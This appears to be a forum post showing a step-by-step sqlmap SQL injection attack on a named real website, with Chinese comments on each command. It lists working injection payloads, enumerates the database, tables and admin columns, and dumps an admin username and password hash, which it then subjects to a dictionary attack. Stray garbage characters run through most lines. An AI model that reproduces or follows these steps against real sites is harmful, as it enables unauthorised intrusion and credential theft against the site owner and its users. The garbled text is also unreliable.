D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
@/ O+ Y t( w/ ^7 k0 ?ms "Mysql" --current-user /* 注解:获取当前用户名称
5 ?- e* w3 M* E sqlmap/0.9 - automatic SQL injection and database takeover tool6 \9 h9 z8 v k* o! x4 c
http://sqlmap.sourceforge.net starting at: 16:53:54
1 `# o6 X' F u6 \[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
% F% B+ O1 {- e, E session file" t3 M* _0 K! y
[16:53:54] [INFO] resuming injection data from session file% z5 Z* F0 y3 W% V6 U L! C
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
0 N" B5 V$ n: H9 X, M[16:53:54] [INFO] testing connection to the target url% A1 G0 G- B5 r1 S! z3 N$ B( W
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
8 s9 N; N+ z1 h" a6 r* {sts:( N# p$ T. P/ @8 k' J/ w: t t5 D
---- v# L! e3 h' \2 k. p; K5 _
Place: GET
4 |2 a m- u" [6 T. F8 i* D: cParameter: id
0 c% O% d1 q+ O# C; U: ~( u Type: boolean-based blind7 y: K* l# |. e, A8 z
Title: AND boolean-based blind - WHERE or HAVING clause
- T$ c& K- I0 c! }; N1 D& M0 } Payload: id=276 AND 799=799, r2 S- e; d: f! o+ z) A( k
Type: error-based
, B7 {( q: V; @5 _3 z: V& W- ^* P% V Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
5 J: J1 \# D1 m" u' i$ v k Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
/ |8 o8 f0 M. n1 Z+ b120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
1 I$ }" G5 z8 d),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)* X, R- h: D2 D$ d* Q- K/ Y1 }
Type: UNION query
( i1 [$ o# S( x% ]) K+ p2 ]3 R9 l Title: MySQL UNION query (NULL) - 1 to 10 columns
, [- P: ]2 n6 z. M# _3 B; W Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR+ Q* z5 O9 J& l- U7 S
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
8 c# Z" w2 w/ i5 WCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
4 q6 `' d: C/ k; v- Q9 ^7 w Type: AND/OR time-based blind
( Q# \0 J. ~9 X; \, J Title: MySQL > 5.0.11 AND time-based blind+ A) N7 l8 \0 @) f& M" j2 ?
Payload: id=276 AND SLEEP(5)/ P9 z% }2 I# S7 q, t
---7 l+ ?; |+ R. \3 A( Q
[16:53:55] [INFO] the back-end DBMS is MySQL
& ?! j8 z' M" @ y" w' zweb server operating system: Windows- n, R* j% D5 N3 K9 d9 e$ V8 r3 C1 w
web application technology: Apache 2.2.11, PHP 5.3.0
' ]+ ]/ h j% V% \- h! B8 o; a+ t \back-end DBMS: MySQL 5.04 V- m U$ s$ u
[16:53:55] [INFO] fetching current user
- x( N9 C9 ?4 U7 U' A1 g; j4 Z: acurrent user: 'root@localhost'
! t+ W; H+ Z7 [( u3 P+ P& @[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
- t u% R3 d( S* H' C/ D' htput\www.wepost.com.hk' shutting down at: 16:53:58) s$ L! {( O! U1 O( R q9 @
. x5 c- i2 q1 Z* G, M
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db" g& S* e v: n
ms "Mysql" --current-db /*当前数据库
0 Z3 ?+ ?: Y E( H sqlmap/0.9 - automatic SQL injection and database takeover tool7 o- E3 R |. ?7 U
http://sqlmap.sourceforge.net starting at: 16:54:16; C; f0 ~) G) G5 i# j+ Z
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
7 G: D8 ]4 V" R session file; Q3 J- m& K3 D. c$ l) ?
[16:54:16] [INFO] resuming injection data from session file' e, x. I! E, Y2 K
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
7 l7 C+ r' u/ O! C3 Q+ L( x, U[16:54:16] [INFO] testing connection to the target url
! \: S9 D* X S3 B! Vsqlmap identified the following injection points with a total of 0 HTTP(s) reque
, `% x8 ~: L$ t" g3 M8 f4 J7 Xsts:
. V( E* @5 _/ n- i: k- Z) D! M/ m7 W---' S$ `4 v# Y, Q) E3 F& @
Place: GET
2 c& y! W* m0 L3 }; p- \- A4 L) t& }Parameter: id
1 z2 p+ {0 d1 s$ s8 Q7 i! r7 { Type: boolean-based blind
' r5 c- v. r" G+ c2 D Title: AND boolean-based blind - WHERE or HAVING clause
5 i3 M3 Z2 e6 \ Payload: id=276 AND 799=7990 x( \ r4 f2 _
Type: error-based
% W" r: s! y' f Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
: ^0 E, i7 c0 t Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
* n$ f$ j4 A4 y" Q f* t0 l, [+ {120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
6 u* i- H; y, E8 \( S5 H5 X),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
: Y7 t8 |, {" g' R9 x o Type: UNION query
- y, T0 G' s: y9 A) l( W" y Title: MySQL UNION query (NULL) - 1 to 10 columns
. p Z! h0 ?" j, \ Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
- x6 H0 `: d/ k1 ?8 E$ }5 s(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),9 _) [" A& p) u6 r* \
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#8 y D. ?$ O3 O7 ~ P7 q% h5 i% U- w
Type: AND/OR time-based blind1 L/ y3 ^) G+ W8 k
Title: MySQL > 5.0.11 AND time-based blind
6 X# c. Z* S: F6 q. Y5 s; R Payload: id=276 AND SLEEP(5): `6 H# t# J: g; N
---
& I+ p' k- O' {; J$ w3 E4 p6 ~[16:54:17] [INFO] the back-end DBMS is MySQL
6 a# v5 V- M% B% lweb server operating system: Windows
7 f# D2 y) ^) S% r2 I0 Jweb application technology: Apache 2.2.11, PHP 5.3.0
- [( f$ F5 W; ~, l: t# D0 tback-end DBMS: MySQL 5.0
: s4 l! X! }6 q, x) r" z- ~0 N, f+ G[16:54:17] [INFO] fetching current database; \3 ^* k% A* S3 f
current database: 'wepost'
2 ]3 ] X9 c! M+ ~7 K; ^3 [$ R* j[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
7 ?" w4 B/ a3 Y3 o; utput\www.wepost.com.hk' shutting down at: 16:54:18
. e5 l* S! }1 e' S3 y2 X" G3 J5 gD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db) D- N' D& T% R% r$ U" z
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
3 [ M, }6 l3 b6 R& F# G sqlmap/0.9 - automatic SQL injection and database takeover tool( Q$ M0 r1 ^: h3 E) x7 x2 q. A$ \
http://sqlmap.sourceforge.net starting at: 16:55:25' x! C; n2 I' l% p/ F
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
! ~: i. U8 Q0 i session file3 Q, L7 B( W+ o/ S! M2 t9 r5 m
[16:55:25] [INFO] resuming injection data from session file: T# y% G1 k' \7 {- A
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
/ N* F G' M+ |! L[16:55:25] [INFO] testing connection to the target url4 R+ `! ?4 K1 I# G' t
sqlmap identified the following injection points with a total of 0 HTTP(s) reque" y" y# D( ~4 o' g+ L
sts: x4 z' u0 ?9 O9 o; F9 z
---, T6 V6 s% N& K6 c1 V* q. v% Z/ R
Place: GET
- x/ s* Q/ _. S" _8 e6 ?Parameter: id
7 h! j v! J7 w* z& m# k3 Z Type: boolean-based blind- Z+ P5 q& `6 B
Title: AND boolean-based blind - WHERE or HAVING clause7 [( b$ F( l! E1 T
Payload: id=276 AND 799=799
: r' B0 T( u1 |! t% [9 K* A Type: error-based
8 C2 P, b/ X6 O) O8 `) f Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
; Y3 S8 N2 j7 w" R Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,3 i' L' s# @) q: B' q/ e" m7 R
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,588 M: H0 i7 m! ], G5 X
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)" F1 M( Q( I. c( m4 N
Type: UNION query& D( v7 v) i9 W9 P7 o2 `
Title: MySQL UNION query (NULL) - 1 to 10 columns
) K5 o; p$ \; A3 ] Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
7 Q8 C1 C5 ^+ m- c. r# g3 `(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),( o( ~. B3 t1 d# M }. E# Q( |
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
/ z' o! C( n+ U* P2 V0 l- o, g Type: AND/OR time-based blind
- U8 @* P. } F; c8 b% H Title: MySQL > 5.0.11 AND time-based blind
& E3 G+ | H, y" P2 @- ? Payload: id=276 AND SLEEP(5)
) b! a0 M2 A% I---" m7 e& f6 K$ c- [4 x
[16:55:26] [INFO] the back-end DBMS is MySQL# Q+ S# x/ a! Y m' n: X6 E8 G
web server operating system: Windows
' N4 ]: X& l: G; Kweb application technology: Apache 2.2.11, PHP 5.3.0* q$ F2 c& r# p0 I) g% K, c% F! S
back-end DBMS: MySQL 5.0% I, T- ?. }0 ]" _4 q
[16:55:26] [INFO] fetching tables for database 'wepost'
# \6 [$ u1 A. ?( ~3 O& E[16:55:27] [INFO] the SQL query used returns 6 entries2 `" }) U( q$ n& J0 H- A$ c
Database: wepost, u6 l- v3 C5 p3 c' g* e3 N( I! ^/ D
[6 tables]% c* z: `5 r: ~2 C- c p1 f3 s
+-------------+
* n% D9 Y- Y" c$ s! b| admin |
% o- y t" \6 k9 n% X: g3 l) C| article |
# z5 K8 n# A4 E; N+ f( v% C0 Z| contributor |7 c" C5 S- V7 B i% Z
| idea |! U* e! z! H; L( M
| image |
0 f* K/ S' z3 \8 E M0 ?| issue |
0 o1 }; g8 O! Y/ j- V3 l+-------------+" @/ | }% `" I6 ?
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
0 ~" {5 |7 o; @# `4 utput\www.wepost.com.hk' shutting down at: 16:55:33& f2 k% ^" Q S) @2 y7 j
1 ^3 k8 L6 E3 e. i% u' Y- tD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db0 f" Y" x) }. E) m& j
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名. k3 F/ K( l! l- M2 s
sqlmap/0.9 - automatic SQL injection and database takeover tool
3 D7 f( f$ z% |- _. v8 r http://sqlmap.sourceforge.net starting at: 16:56:06
2 z, M% Z9 ~7 y: D: J! Esqlmap identified the following injection points with a total of 0 HTTP(s) reque4 n9 }1 X. a3 ] S/ w7 B; G8 E" Y
sts:5 ^' m# P; ? U. g n% B7 B
---3 g0 c) Q8 d3 i8 ?3 @9 p
Place: GET
, E U) B; C% f! cParameter: id9 H; a5 J" o8 h8 s% x* g
Type: boolean-based blind3 a0 c8 O1 C9 ~3 E) a
Title: AND boolean-based blind - WHERE or HAVING clause% m+ T0 d. p$ P9 B% J8 }9 B* ]' V
Payload: id=276 AND 799=799
5 k) Z7 ?1 g) i Type: error-based4 X( f, P% z# |% c @% z0 F
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause* u. b4 a; X' T/ A4 m3 ?- v. {
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,3 J' ?: M2 @/ G5 |( c( G9 |" q
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
6 E$ \7 j4 ~, k) X# I9 A3 n6 a) m$ W; l),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)- e5 p% p3 a5 k9 Q+ r
Type: UNION query( O4 q" @4 q0 u! t) G. Z
Title: MySQL UNION query (NULL) - 1 to 10 columns
8 R1 ~0 X- u. s8 U0 a5 c Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR4 g/ [0 Q! Y- i2 ?/ a; s' e) E
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
1 ^7 B0 |$ j3 F jCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#- V# J+ v, n& U
Type: AND/OR time-based blind
$ ~5 A* j0 F$ y0 v/ R Title: MySQL > 5.0.11 AND time-based blind$ Y" V! S( T8 W* p$ a7 {
Payload: id=276 AND SLEEP(5)
0 u) w8 Y7 f/ M' {( H5 a# \* H---$ a5 e# r( W/ K) B+ D. L
web server operating system: Windows
% s* B9 n$ [. [& l5 wweb application technology: Apache 2.2.11, PHP 5.3.0
$ P# ~: [3 E0 ]9 }1 B7 Z/ ~0 K( D% c% {2 h; |back-end DBMS: MySQL 5.0
1 H, U% j4 _ A' z+ G1 ?! I[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se+ T4 {, H8 Z) L( l
ssion': wepost, wepost
8 q6 \1 Z( `6 I. y3 VDatabase: wepost' ~2 z8 X; J. i* N/ J k2 v' r5 Y
Table: admin9 Z N1 i5 x# A+ p- H8 R) b2 o! P7 X
[4 columns]
4 t7 q4 H: W% d1 }# \+----------+-------------+
6 I _: o7 H% s: y9 t2 v# f4 V| Column | Type |- f) I c0 N" G* a' Q
+----------+-------------+% d2 S/ F ~- ^6 k, o- l" I" Y
| id | int(11) |
* a3 g* [6 w% w& L, q| password | varchar(32) |
2 S2 U8 {2 m* P# B| type | varchar(10) |
! U& U% ~ K; h" U| userid | varchar(20) |$ U) T. h' C0 |! w1 j: t
+----------+-------------+$ \6 `% q! {' I- `$ a/ O( X" _
shutting down at: 16:56:195 k8 ?& Y) U) `$ Z5 Y
C6 }$ q% I& @1 e, s5 }D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
0 A' |: { Y# s! [ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容1 Z- b& n# v4 N7 U# Q% ^
sqlmap/0.9 - automatic SQL injection and database takeover tool: b' Y$ x/ d0 `* A1 O
http://sqlmap.sourceforge.net starting at: 16:57:14" ^% R' i B* P* |
sqlmap identified the following injection points with a total of 0 HTTP(s) reque: G3 `" A( R1 E" W) e1 x! Z
sts:
6 e& s: I; q, a& I, g7 P- C6 H2 m---/ o" s+ ]5 M2 V5 I
Place: GET
/ r. s& Q0 g/ R, v4 S. O IParameter: id4 L- d1 ]5 v5 G m3 H9 }
Type: boolean-based blind7 U# \& E8 ]% i9 h* n' k( l
Title: AND boolean-based blind - WHERE or HAVING clause
4 Z) N* }: S! ?8 c$ E. I1 t6 u Payload: id=276 AND 799=799
, y. }1 ~- t4 F- ^' X Type: error-based% W0 D" R! \- s0 Z/ C5 b! a" [
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause5 m4 h& S! ?5 P
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,5 p0 C3 B* S5 C; w/ P) W) ^
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,589 }7 Z6 n. I3 m! \6 P8 g d* l- `
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
8 W) `3 {" W" a8 v& c8 X; r# n Type: UNION query
Q a: Q- w+ g6 ^ Title: MySQL UNION query (NULL) - 1 to 10 columns
M& C2 |3 s' n Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR+ o/ o3 T: l6 L, u7 F: C- J
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
2 i7 G- q$ o- |CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#0 O& r: S/ U9 I4 U( m
Type: AND/OR time-based blind
8 F0 }+ i- w. N4 u5 K$ c Title: MySQL > 5.0.11 AND time-based blind/ k6 y' A7 k5 O m4 s
Payload: id=276 AND SLEEP(5)
& h0 P4 a( P/ ]/ e---
8 R3 g! R9 {2 x1 A9 b$ Bweb server operating system: Windows
, I/ Y8 Y! E. O* i X& o$ @, |web application technology: Apache 2.2.11, PHP 5.3.0) U+ U2 p0 p( C; {
back-end DBMS: MySQL 5.0
1 h+ w/ T. J6 W; I' ?) u0 ?# ^recognized possible password hash values. do you want to use dictionary attack o2 n* r% [3 z. D3 ?! C2 i7 {) W
n retrieved table items? [Y/n/q] y
( _" M) o2 ?8 X \what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
) ^0 Z3 n) C3 R& @' Q1 Ddo you want to use common password suffixes? (slow!) [y/N] y
" v2 `( ]" @$ J0 d5 p) @- I/ sDatabase: wepost1 b+ ?1 i* Q" m
Table: admin
8 R* B4 k+ T! ?& B3 O. b, b9 o) o* H% n[1 entry]
7 E+ Q P% b! I) _+----------------------------------+------------+
0 B* D' ?9 {2 ^9 e `: `) @| password | userid |
: M6 s3 K4 f% K. ?) o+----------------------------------+------------+) ]0 C& y& k7 e
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
. \: i6 Y& @: D2 h+----------------------------------+------------+
* d' B5 z2 b& s: B' l y4 R' M5 _ shutting down at: 16:58:14
* _/ S+ F, B2 a4 |9 [0 l$ j; z) W5 R* N" k% j0 r: v
D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对